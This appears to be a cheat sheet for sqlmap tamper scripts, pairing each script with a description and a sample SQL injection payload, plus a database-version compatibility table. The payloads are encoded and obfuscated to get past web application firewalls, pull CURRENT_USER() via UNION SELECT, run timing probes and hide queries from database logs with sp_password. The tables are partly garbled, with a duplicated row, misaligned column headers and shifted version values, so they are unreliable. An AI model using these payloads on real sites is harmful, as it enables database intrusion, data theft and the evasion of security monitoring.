(*) It might work for all versions. (-) Does not apply
| TAMPER | MySQL | MSSQL | Oracle | PostgreSQL |
|---|---|---|---|---|
| apostrophemask | * | * | * | * |
| apostrophenullencode | - | - | - | - |
| appendnullbyte | * | * | * | * |
| base64encode | 4,5,5.5 | 2005 | 10g | - |
| between | 5.1 | - | - | - |
| bluecoat | * | * | * | * |
| apostrophemask | 9.0.3 | 2000,2005 | - | 9.3 |
| charunicodeencode | 4,5.0 and 5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| charencode | * | - | - | - |
| commalessmid | * | - | - | - |
| concat2concatws | * | * | * | * |
| equaltolike | * | * | * | * |
| greatest | < 5.1 | - | - | - |
| halfversionedmorekeywords | 5.0 and 5.5 | - | - | - |
| ifnull2ifisnull | * | * | * | * |
| informationschemacomment | 4,5.0,5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| lowercase | 5.0 | - | - | - |
| modsecurityversioned | 5.0 | - | - | - |
| modsecurityzeroversioned | * | * | * | * |
| multiplespaces | * | * | * | * |
| nonrecursivereplacement | * | * | * | * |
| overlongutf8 | 5.1.56,5.5.11 | 2000, 2005 | N/A | 9.0 |
| percentage | 4, 5.0,5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| randomcase | * | * | * | * |
| randomcomments | * | * | * | * |
| securesphere | 4,5.0,5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| space2comment | - | - | - | - |
| space2dash | 4.0,5.0 | - | - | - |
| space2hash | >= 5.1.13 | - | - | - |
| space2morehash | - | 2000, 2005 | - | - |
| space2mssqlblank | * | * | - | - |
| space2mssqlhash | * | * | * | * |
| space2plus | 4,5.0,5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| space2randomblank | - | * | - | - |
| sp_password | * | * | * | * |
| symboliclogical | * | * | * | * |
| unionalltounion | * | * | * | * |
| unmagicquotes | 4, 5.0,5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| uppercase | * | * | * | * |
| varnish | * | - | - | - |
| versionedkeywords | >=5.1.13 | - | - | - |
| versionedmorekeywords | * | * | * | * |
| xforwardedfor | * | * | * | * |
| Name | Description | Example | Oracle | PostgreSQL |
|---|---|---|---|---|
| apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' | * | * |
| apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart | 1 AND %271%27=%271' | - | - |
| appendnullbyte.py | Appends encoded NULL byte character at the end of payload | 1 AND 1=1' | * | * |
| base64encode.py | Base64 all characters in a given payload | MScgQU5EIFNMRUVQKDUpIw==' | 10g | - |
| between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | 1 AND A NOT BETWEEN 0 AND B--' | - | - |
| bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | SELECT%09id FROM users where id LIKE 1' | * | * |
| chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | %2553%2545%254C%2545%2543%2554%2520%2 546%2549%2545%254C%2544%2520%2546%2552 %254F%254D%2520%2554%2541%2542%254C%2545' | - | 9.3 |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' | 'LIMIT 3 OFFSET 2'' | 10g | 8.3,8.4,9.0 |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' | MID(VERSION() FROM 1 FOR 1)' | - | - |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' | CONCAT_WS(MID(CHAR(0),0,0),1,2)' | - | - |
| charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | %53%45%4C%45%43%54%20%46%49%45%4C%4 4%20%46%52%4F%4D%20%54%41%42%4C%45' | * | * |
| charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) | %u0053%u0045%u004C%u0045%u0043%u0054%u 0020%u0046%u0049%u0045%u004C%u0044%u002 0%u0046%u0052%u004F%u004D%u0020%u0054% u0041%u0042%u004C%u0045' | * | * |
| equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' | SELECT * FROM users WHERE id LIKE 1' | - | - |
| escapequotes.py | Slash escape quotes (' and ") | 1\\" AND SLEEP(5)#' | - | - |
| greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | 1 AND GREATEST(A,B+1)=A' | * | * |
| halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | "value'/!0UNION/!0ALL/!0SELECT/!0CONCAT (/!0CHAR(58,107,112,113,58),/!0IFNULL(CAST( /!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR (32)),/!0CHAR(58,97,110,121,58)),/!0NULL,/!0N ULL#/!0AND 'QDWa'='QDWa" | 10g | 8.3,8.4,9.0 |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | IF(ISNULL(1),2,1)' | - | - |
| modsecurityversioned.py | Embraces complete query with versioned comment | 1 /!30874AND 2>1/--' | - | - |
| modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | 1 /!00000AND 2>1/--' | * | * |
| multiplespaces.py | Adds multiple spaces around SQL keywords | 1 UNION SELECT foobar' | * | * |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters | 1 UNIOUNIONN SELESELECTCT 2--' | * | * |
| percentage.py | Adds a percentage sign ('%') infront of each character | %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' | N/A | 9.0 |
| overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | SELECT%C0%AAFIELD%C0%AAFROM%C0%AAT ABLE%C0%AAWHERE%C0%AA2%C0%BE1' | 10g | 8.3,8.4,9.0 |
| randomcase.py | Replaces each keyword character with random case value | INseRt' | * | * |
| randomcomments.py | Add random comments to SQL keywords | I//N//SERT' | * | * |
| securesphere.py | Appends special crafted string | "1 AND 1=1 and '0having'='0having'" | 10g | 8.3,8.4,9.0 |
| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | 1 AND 9227=9227-- sp_password' | - | - |
| space2comment.py | Replaces space character (' ') with comments '/**/' | SELECT//id//FROM/**/users' | - | - |
| space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | 1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' | - | - |
| space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | 1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227 =9227' | - | - |
| space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | 1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23 lujYFWfv%0A9227=9227' | - | - |
| space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | SELECT%0Eid%0DFROM%07users' | * | * |
| space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | 1%23%0AAND%23%0A9227=9227' | 10g | 8.3,8.4,9.0 |
| space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | SELECT%A0id%0BFROM%0Cusers' | - | - |
| space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | 1--%0AAND--%0A9227=9227' | * | * |
| space2plus.py | Replaces space character (' ') with plus ('+') | SELECT+id+FROM+users' | * | * |
| space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | SELECT%0Did%0DFROM%0Ausers' | * | * |
| symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) | "1 %26%26 '1'='1" | 10g | 8.3,8.4,9.0 |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | -1 UNION SELECT' | * | * |
| unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | 1%bf%27 AND 1=1-- ' | - | - |
| uppercase.py | Replaces each keyword character with upper case value | INSERT' | - | - |
| varnish.py | Append a HTTP header 'X-originating-IP' | http://h30499.www3.hp.com/t5/Fortify-Application-S ecurity/Bypassing-web-application-firewalls-using-HT TP-headers/ba-p/6418366 | * | * |
| versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | 1/!UNION//!ALL//!SELECT//!NULL/,/!NULL /,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST (CURRENT_USER()/!AS//!CHAR/),CHAR(32)),CH AR(58,100,114,117,58))# | * | * |
| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | 1/!UNION//!ALL//!SELECT//!NULL/,/!NULL /,/!CONCAT/(/!CHAR/(58,122,114,115,58),/!IFN ULL/(CAST(/!CURRENT_USER/()/!AS//!CHAR /),/!CHAR/(32)),/!CHAR/(58,115,114,121,58))#' | ||
| xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' | headers["X-Forwarded-For"]' |